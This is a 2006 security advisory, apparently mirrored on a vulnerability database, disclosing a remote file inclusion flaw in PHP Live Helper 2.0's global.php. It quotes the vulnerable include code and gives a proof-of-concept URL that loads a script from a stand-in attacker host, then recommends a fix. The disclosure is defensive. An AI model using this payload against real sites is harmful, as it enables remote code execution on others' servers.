Lucene search
K

Echo Security Advisory 2006.42

🗓️ 18 Aug 2006 00:00:00Reported by Echo SecurityType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

A highly critical remote file inclusion vulnerability exists in PHP Live Helper version 2.0, allowing arbitrary PHP code execution

Code
`____________________ ___ ___ ________  
\_ _____/\_ ___ \ / | \\_____ \  
| __)_ / \ \// ~ \/ | \  
| \\ \___\ Y / | \  
/_______ / \______ /\___|_ /\_______ /  
\/ \/ \/ \/ .OR.ID  
ECHO_ADV_42$2006  
  
---------------------------------------------------------------------------------------------------  
[ECHO_ADV_42$2006] PHP Live Helper <= 2.0 (abs_path) Remote File Inclusion  
---------------------------------------------------------------------------------------------------  
  
Author : Ahmad Maulana a.k.a Matdhule  
Date Found : July, 02nd 2006  
Location : Indonesia, Jakarta  
web : http://advisories.echo.or.id/adv/adv42-matdhule-2006.txt  
Critical Lvl : Highly critical  
Impact : System access  
Where : From Remote  
---------------------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
PHP Live Helper  
  
Application : PHP Live Helper  
version : Latest version [2.0]  
URL : http://www.turnkeywebtools.com/phplivehelper  
  
---------------------------------------------------------------------------  
  
Vulnerability:  
~~~~~~~~~~~~~~~~  
  
-----------------------global.php----------------------  
....  
<?PHP  
/*  
global.php - 05/30/2006 - 5:27pm PST - 2.0  
  
PHP Live Helper  
http://www.turnkeywebtools.com/phplivehelper/  
  
Copyright (c) 2001-2006 Turnkey Web Tools, Inc.  
*/  
  
define('PLH_SESSION_START', '1');  
  
////////////////////////////  
// Load Class & Secure Files  
////////////////////////////  
  
require_once $abs_path."/libsecure.php";  
include_once $abs_path."/include/class.browser.php";  
...  
----------------------------------------------------------  
  
Input passed to the "abs_path" parameter in global.php is not  
properly verified before being used. This can be exploited to execute  
arbitrary PHP code by including files from local or external  
resources.  
  
Proof Of Concept:  
~~~~~~~~~~~~~~~~~  
  
http://target.com/[phplivehelper_path]/global.php?abs_path=http://attacker.com/inject.txt?  
  
Solution:  
~~~~~~~~~  
- Sanitize variable $abs_path on global.php.  
  
Notification:  
~~~~~~~~~~~~  
  
I've been contacting the web/software administrator to tell about this hole in his system, but instead of giving a nice   
  
response, he replied so rudely and arrogantly. I recommend not to use this product for your own sake.  
  
---------------------------------------------------------------------------  
Shoutz:  
~~~~~  
~ solpot a.k.a chris, J4mbi H4ck3r thx for the hacking lesson :)   
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous  
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama  
~ [email protected], [email protected]  
~ Solpotcrew Comunity , #jambihackerlink #e-c-h-o @irc.dal.net  
------------------------------------------------------------------------  
---  
Contact:  
~~~~~~  
  
matdhule[at]gmail[dot]com  
  
-------------------------------- [ EOF ]----------------------------------  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Aug 2006 00:00Current
0.4Low risk
Vulners AI Score0.4
27